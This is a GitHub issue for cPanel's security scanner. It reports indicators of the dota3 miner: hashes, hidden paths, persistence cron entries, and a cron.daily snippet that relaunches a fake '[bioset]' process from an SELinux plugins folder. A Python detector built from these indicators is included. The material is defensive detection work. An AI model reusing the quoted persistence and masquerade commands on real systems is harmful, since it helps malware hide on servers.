CpanelInc / tech-CSI

cPanel Security Scan

additional dota3 #14

Closed JQuags closed 2 years ago

JQuags commented 2 years ago

Process runs in a chain like: -go(992271)---timeout(376718)---tsm(376719)---tsm(376724)-+-{tsm}(376725)

Location can vary from /dev/shm or /tmp - sometimes in /root/.configrc.

64b9584e5ca7d5c4980bd72e63718b634a8912d4dc123de940db36dd111931ae /dev/shm/.X867123/.rsync/a/kswapd0
0f754eab280e5ff0b65c46bdd1cc16e8aff944c834379df2632cd5f261afe3bb /dev/shm/.X867123/.rsync/c/lib/64/tsm
0f754eab280e5ff0b65c46bdd1cc16e8aff944c834379df2632cd5f261afe3bb /tmp/.X2ss-unix/.rsync/c/lib/64/tsm
e0ebf578cd13fee0b79ea7cd72769cf99677557f389920270034ff71fbb7da5f /tmp/.X2ss-unix/dota3.tar.gz

Cron doesn't vary much except based on the user:

1 1 */2 * * /home/admin/.configrc/a/upd>/dev/null 2>&1
@reboot /home/admin/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/admin/.configrc/b/sync>/dev/null 2>&1
@reboot /home/admin/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X2ss-unix/.rsync/c/aptitude>/dev/null 2>&1

root would be in /root/.configrc

SSH key placed on the system is already detected by csi (mdrfckr)

JQuags commented 2 years ago

Going to add to this open one for something new found:

8e08c7c440bf9f5380dd614238fa2d38 [bioset]
241cd0489ce1d5907572b9606322735a conf
664035124a33cb4ac6aac67157f5244a update

process

Hidden within /etc/selinux/targeted/plugins

additionally in the man-db cron in /etc/cron.daily

pidk=$(ps aux | grep bioset | grep -v grep | grep -v '0.0\s0.0\s0' | awk '{print $2}')
kill -9 $pidk > /dev/null 2>&1
cd /etc/selinux/targeted/plugins
PATH=$PATH:$PWD
nohup [bioset] >/dev/null 2>&1&
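The indicators from both comments above (dota3 file hashes and hidden-directory paths, the .configrc/.rsync cron entries, and the [bioset] process posing as a kernel thread) turned into one host check, as an added example that is not code from csi.pl; the ps, cron and hash samples are constructed, and the VSZ test mirrors the dropper's own `grep -v '0.0\s0.0\s0'` trick, since a real kernel thread always reports VSZ 0.

```python
import re

# Indicators quoted in this issue; the scanning logic itself is an added
# illustration and is not code from csi.pl.
KNOWN_HASHES = {
    "64b9584e5ca7d5c4980bd72e63718b634a8912d4dc123de940db36dd111931ae",  # .rsync/a/kswapd0
    "0f754eab280e5ff0b65c46bdd1cc16e8aff944c834379df2632cd5f261afe3bb",  # .rsync/c/lib/64/tsm
    "e0ebf578cd13fee0b79ea7cd72769cf99677557f389920270034ff71fbb7da5f",  # dota3.tar.gz
    "8e08c7c440bf9f5380dd614238fa2d38",  # [bioset]
    "241cd0489ce1d5907572b9606322735a",  # conf
    "664035124a33cb4ac6aac67157f5244a",  # update
}
CRON_RE = re.compile(r"\.configrc/[ab]/(upd|sync)\b|\.rsync/c/aptitude\b|/etc/selinux/targeted/plugins")
PATH_RE = re.compile(r"^(/dev/shm|/tmp)/\.X[^/]*/\.rsync/|/\.configrc/|^/etc/selinux/targeted/plugins/")

def check_ps_line(line):
    """One 'ps aux' row -> reason string if it matches the report, else None.
    A '[name]' command with non-zero VSZ is not a kernel thread (those show VSZ 0)."""
    f = line.split(None, 10)
    if len(f) < 11 or f[1] == "PID":
        return None
    vsz, cmd = f[4], f[10]
    if cmd.startswith("[") and cmd.endswith("]") and vsz != "0":
        return "kernel-thread impersonation: %s (VSZ %s)" % (cmd, vsz)
    if PATH_RE.search(cmd):
        return "dota3 path in command: %s" % cmd
    return None

def scan(cron_lines, ps_lines, file_hashes):
    """Collect findings; file_hashes maps path -> hex digest (sha256 or md5)."""
    hits = {"cron": [l.strip() for l in cron_lines if CRON_RE.search(l)],
            "process": [r for r in map(check_ps_line, ps_lines) if r], "file": []}
    for path, digest in file_hashes.items():
        if digest.lower() in KNOWN_HASHES:
            hits["file"].append("known hash: " + path)
        elif PATH_RE.search(path):
            hits["file"].append("suspicious path: " + path)
    return hits

# Constructed sample input (not captured from a real host).
CRON_SAMPLE = ["1 1 */2 * * /home/admin/.configrc/a/upd>/dev/null 2>&1",
               "0 2 * * * /usr/bin/certbot renew",
               "0 0 */3 * * /tmp/.X2ss-unix/.rsync/c/aptitude>/dev/null 2>&1"]
PS_SAMPLE = """USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 48 0.0 0.0 0 0 ? S 10:01 0:00 [kswapd0]
root 912 0.0 0.0 7400 3600 ? Sl 10:05 0:00 [bioset]
admin 2200 98.0 1.2 152000 40000 ? Sl 10:07 9:14 /dev/shm/.X867123/.rsync/a/kswapd0
root 130 0.0 0.0 9200 3900 ? Ss 10:00 0:00 /usr/sbin/sshd -D""".splitlines()
FILES_SAMPLE = {"/etc/selinux/targeted/plugins/[bioset]": "8e08c7c440bf9f5380dd614238fa2d38",
                "/tmp/.X2ss-unix/.rsync/c/lib/64/tsm": "00" * 32,  # unknown hash, bad path
                "/usr/bin/ls": "ab" * 32}
```

Run `scan(CRON_SAMPLE, PS_SAMPLE, FILES_SAMPLE)` to see the three finding lists; the legitimate `[kswapd0]` row (VSZ 0) and the certbot cron line are not reported.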

cPanelPeter commented 2 years ago

Thank you. The necessary files were updated to include these checks.